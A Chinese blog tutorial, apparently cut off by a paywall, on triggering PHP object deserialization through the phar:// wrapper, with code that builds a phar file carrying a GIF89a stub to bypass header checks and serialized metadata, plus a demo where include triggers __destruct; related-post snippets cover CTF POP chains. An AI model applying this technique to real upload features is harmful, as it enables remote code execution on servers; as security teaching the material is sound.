mysql 反序列化函数_利用phar协议造成php反序列化

最新推荐文章于 2024-06-02 21:59:18 发布
最新推荐文章于 2024-06-02 21:59:18 发布
阅读量406 收藏
点赞数
文章标签: mysql 反序列化函数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39843986/article/details/113306355
版权

0x00前言

在php中反序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列化payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发反序列化操作了

0x01 构造有反序列化payload的phar文件

首先,phar是一种php语言的文件的后缀,所以生成phar文件要用到php语言,需要在php.ini中开启相应的配置

phar.readonly = Off

153b678c364ddf147d7a38b19f2ae905.png

生成phar文件的代码如下

//反序列化payload构造

class TestObject {

}

@unlink("phar.phar");

$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();

//设置stub,GIF89a可以改成其他的字段,绕过文件头检验,但必须以 __HALT_COMPILER(); ?> 结尾

$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");

//将反序列化的对象放入该文件中

$o = new TestObject();

$o->data='just a test';

$phar->setMetadata($o);

//phar本质上是个压缩包,所以要添加压缩的文件和文件内容

$phar->addFromString("test.txt", "test");

$phar->stopBuffering();

?>

尝试一下,生成带有payload的文件

320db3427c0bb75d718067ac570e0617.png

简单的说下phar文件格式

phar文件头的识别格式是xxx + <?php __HALT_COMPILER(); ?>,只有这样的格式才能被识别为phar文件

phar是压缩文件,那么压缩文件的信息就会存在第二段manifest describing,这一段是放序列化的poc

压缩的文件的内容被存在第三段,也就是上面payload的中的text.txt

数字签名为该phar的第四段

了解phar文件格式,主要注意的点有2个,文件头的合法性和压缩文件信息处可自定义我们的payload

0x02 可触发phar协议的函数

利用一个漏洞,最初要知道payload从哪里传入,是哪个函数造成的,而php函数中支持伪协议的有很多,下面这张表就是能解析phar协议的函数(用一下别人的图)

250b8d034b739025b65fb7112605fbd3.png

这些函数里面可以使用phar协议,当然还有常用的文件包含的几个函数 include、include_once、requrie、require_once

做一个简单的测试

class TestObject{

function __destruct(){

echo $this->data;

}

}

include "phar://phar.phar/test.txt";

?>

b5c2db1ef2418ba58b75bb424de69467.png

同理,使用unlink()函数试试

class TestObject{

function __destruct(){

echo $t

最低0.47元/天 解锁文章
weixin_39843986
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF中phar协议和gopher协议利用
weixin_44687621的博客
09-07 979
我们在学习SSRF漏洞的时候,经常会只关注file协议等,因为利用方式简单。实际上随着php版本的提升和编程技术的规范,能够直接利用的漏洞越来越少了,所以学习使用phar和gopher协议是很有必要的。 phar协议php序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发序列操作了 phar流包装器不能
PHP phar序列
weixin_55190422的博客
09-23 583
以题为例 进来后我们注册一个账户并登录 查看一下网页源代码发,并没有发现什么我们上传个文件看看能不能通过菜刀获取权限 发现并不能连接上。此时我们通过BP抓包看看能不能获取到有用的信息 发现一个filename裸露在我们视野我们考虑让filename=xxx.php获取到index.php 我们这样尝试发现没用这是为啥呢?这里有个细节我们一般上传文件都是在网站主目录下的,所以这里需要跳转到上级目录所以我们需要让filename=../../index.php 出现了index.
序列漏洞(4), phar文件序列, 漏洞实验, 漏洞利用
探测???
11-20 207
PHAR,全称PHP Archive,是一种将PHP代码和资源打包成一个自包含的文件的格式。这种文件格式可以将PHP代码文件和其他资源集合在一起,实现应用程序、库或插件的分发。在PHP中,Phar广泛应用于打包应用程序、库或插件,使得它们能在不同的环境中部署和共享变得轻松。
PHAR序列
最新发布
weixin_74020633的博客
06-02 1011
在C1e4r中,echo可以触发_toString,destruct在变量摧毁时会自动触发,所以就形成完整的pop链C1e4r::_destruct->Show::_toString->Test::file_get()将生成的phar文件上传成功后,使用phar协议读取文件,在使用phar协议解析时,php一大部分的文件系统函数(下图中的函数)都会将meta-data进行序列。明显存在php序列 ,构造poc后,生成phar文件,将phar文件上传之后再通过post来cat flag。
mysql 序列_php序列
weixin_39854778的博客
12-21 312
一、 什么是序列,什么是序列编程语言有很多数据类型,比如常见的字符串,整数,数组$str="luoke";$int=10;$arr=array("luoke","10");var_dump($str,$int,$arr);这些我们都可以用serialize将其序列输出echo serialize($str);echo serialize($int);echo seriali...
PHAR序列漏洞
kunkun_xiaomeng的博客
08-31 880
phar序列
PHP序列
m0_62451321的博客
11-07 5632
POP即:面向属性编程(Property-Oriented Programing)常用于上层语言构造特定调用链的方法,是从现有运行 些工作了。一般的序列攻击都在PHP魔术方法中出现可利用的漏洞,因为自动调用触发漏洞,但如果关键代码没在魔术方法中,而是在一个类的普通方法中。这时候就可以通过构造POP链寻找相同的函数名将类的属性和敏感函数的属性联系起来。(1)先要确定起点和终点,如果起点有多个,那么就去尝试最有可能进行相互跳转的一个,起点和终点无法确定,POP链不可能成功。
利用PHAR协议进行PHP序列攻击
Jeeseen123的博客
06-28 395
PHAR (“Php ARchive”) 是PHP中的打包文件,相当于Java中的JAR文件,在php5.3或者更高的版本中默认开启。PHAR文件缺省状态是只读的,当我们要创建一个Phar文件需要修改php.ini中的phar.readonly,修改为:phar.readonly = 0 当通过phar://协议phar文件进行文件操作时,将会对phar文件中的Meta-data进行序列操作,可能造成一些序列漏洞。 本文由锦行科技的安全研究团队提供,从攻击者的角度展示了PHAR序列攻击的原理和
利用PHAR协议进行PHP序列攻击1
08-03
乎所有件操作函数都可触发 phar 序列题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
Laravel8序列POP链分析挖掘 .pdf
09-05
在Laravel 8中,作者提到了CVE-2021-3129,这是一个在Debug模式下可能导致任意代码执行的漏洞,它涉及到Phar序列。然而,随着框架版本的升级,Laravel对某些类添加了`__wake`方法以限制序列,这使得传统的...
KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和序列)1
08-03
由于KiteCMS基于ThinkPHP5.1,这意味着攻击者可能利用这个漏洞创建包含恶意代码的Phar文件,并尝试进行序列攻击。 为了利用这个序列漏洞,攻击者首先需要能够上传Phar文件。尽管系统对上传的文件类型和大小...
php_phar.zip
11-23
- **自动加载**:通过设置Phar的自动加载函数,可以简代码的加载过程。 - ** stub**:启动脚本,用于引导Phar文件的执行。通常包含PHP代码,可以定义入口点和执行逻辑。 - **解压和缓存**:Phar会自动处理文件...
详解使用php-cs-fixer格式代码
12-16
$ wget https://cs.symfony.com/download/php-cs-fixer-v2.phar -O php-cs-fixer $ chmod +x php-cs-fixer 2. 配置到PhpStorm ps:使用php-cs-fixer格式你的代码 在开发中,我们会有意识的遵行一套规范来保证团队...
php伪终端,四个实例递进php序列漏洞理解
weixin_33826994的博客
03-16 203
索引最近在总结php序列相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php序列漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行!D0g3为了让大家进入状态,来一道简单的序列小题,新来的表哥们可以先学习一下php序列序列。顺便安利一下D0g3小组的平台~题目平台地址:http://ct...
PHP进阶
new03的专栏
02-19 159
数组 数组定义:  $arr = array(); 表示创建一个空数组,并把创建的空数组赋值给变量$arr。   PHP有两种数组:索引数组、关联数组。 索引数组是指数组的键是整数的数组,并且键的整数顺序是从0开始,依次类推。 $fruit = array("苹果","香蕉","菠萝"); 注意数组的键是从0开始的。可以使用print_r($fruit);语句输出数组键及对应的值...
php自动序列,php序列函数unserialize对象注入漏洞(也成为pop链漏洞)
weixin_36080939的博客
03-10 315
今天发现主站 https://www.tipsns.com 对应的官方博客http://blog.tipsns.com 居然被别人黑了挂了木马,最后发现了一个非常隐蔽的对象注入漏洞,这里是演示对象注入漏洞的测试程序:class foo{private $file = "test.txt";private $data = "text";public function __destruct(){fil...
mysql 序列函数_phar序列
weixin_42529544的博客
01-21 1002
phar序列前段时间纵横杯遇到一题序列,当时队友做出来了,赛后尝试复现一下,并总结序列内容phar的本质是一种压缩文件,会以序列的形式存储用户自定义的meta-dataPhar文件结构stub:phar文件标识,以 __HALT_COMPILER();?>结尾manifest:压缩文件的属性等信息,以序列的形式存储自定义的meta-datacontents:压缩文件的内容si...
红帽杯linux开发者大赛,红帽杯——Upload your Ticket
weixin_42130889的博客
05-15 112
Upload your Ticket进入题目后填充任意账号密码进行登陆在Ticket Form中提交数据,抓包,这里发送xml数据,可以进行xml注入读取文件配合thinkphp框架结构读取路由信息,定位功能点代码上传的文件后缀必须为xml,但文件内容没有进行限制,这里可以配合phar://进行thinkphp5.2.x序列漏洞利用,在执行系统命令过/readflag时,参考了网上996gam...
Phar的一些利用姿势
XL115715453的博客
12-27 941
文章首发于先知社区:https://xz.aliyun.com/t/3692 Phar的简述 翻译自手册:phar是什么?Phar归档最好的特点是可以方便地将多个文件组合成一个文件。因此,phar归档提供了一种方法,可以将完整的PHP应用程序分发到单个文件中,并从该文件运行它,而不需要将其提取到磁盘。此外,PHP可以像执行任何其他文件一样轻松地执行phar归档,无论是在命令行上还是在...
phar序列poc
05-21
Phar序列漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行序列攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器序列恶意代码,从而实现远程代码执行。 一个简单的Phar...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值